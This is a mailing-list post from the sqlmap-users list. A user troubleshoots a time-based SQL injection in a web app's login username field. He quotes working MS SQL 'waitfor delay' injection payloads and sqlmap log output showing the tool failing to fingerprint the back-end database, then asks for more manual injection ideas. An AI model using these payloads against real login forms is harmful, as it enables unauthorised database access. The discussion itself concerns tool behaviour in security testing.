In fact, don't worry about suggestions for manual syntax, t...@test.com'if
1 = 1 waitfor delay'0:0:20'-- works so I can work with that. But I wonder
why sqlmap is struggling? Chris
On 22 January 2012 18:12, Chris Oakley <christopher.oak...@gmail.com> wrote:
> Hi
>
> I've got a web app where the username field of the login form is affected
> by the following string: t...@test.com'waitfor delay'0:0:10'-- as a
> username; i.e. the delay happens, the app is vulnerable. It will always
> then return you to the login screen with an invalid email error, but we
> should still be able to exploit the app using time based methods. Sqlmap
> picks up on this, but then fails at the fingerprinting stage, i.e:
>
> [18:04:03] [INFO] testing MySQL
> [18:04:03] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:04:16] [CRITICAL] there is considerable lagging in connection
> response(s). Please use as high value for --time-sec option as p
> ossible (e.g. 10 or more)
> [18:04:16] [WARNING] the back-end DBMS is not MySQL
> [18:04:16] [INFO] testing Oracle
> [18:04:17] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based queries
> [18:04:17] [WARNING] the back-end DBMS is not Oracle
> [18:04:17] [INFO] testing PostgreSQL
> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
> [18:04:17] [INFO] testing Microsoft SQL Server
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [18:04:18] [INFO] testing SQLite
> [18:04:18] [WARNING] the back-end DBMS is not SQLite
> [18:04:18] [INFO] testing Microsoft Access
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
> [18:04:18] [INFO] testing Firebird
> [18:04:19] [WARNING] the back-end DBMS is not Firebird
> [18:04:19] [INFO] testing SAP MaxDB
> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
> [18:04:19] [INFO] testing Sybase
> [18:04:19] [WARNING] the back-end DBMS is not Sybase
> [18:04:19] [INFO] testing IBM DB2
> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system. Support for this DBMS will be im
> plemented at some point
>
> I'm not sure why this would be the case, it should be able to find that
> its MS SQL Server.
>
> Any ideas why this might be the case? I can provide more verbose
> information if required, let me know.
>
> In the mean time, any ideas for some more manual injections taking into
> account the syntax of the injection above? I'm going to have a manual play
> now but I thought you might want to know wrt sqlmap.
>
> Cheers
>
> Chris
>
------------------------------------------------------------------------------
Try before you buy = See our experts in action!
The most comprehensive online learning library for Microsoft developers
is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
Metro Style Apps, more. Free future releases when you subscribe now!
http://p.sf.net/sfu/learndevnow-dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
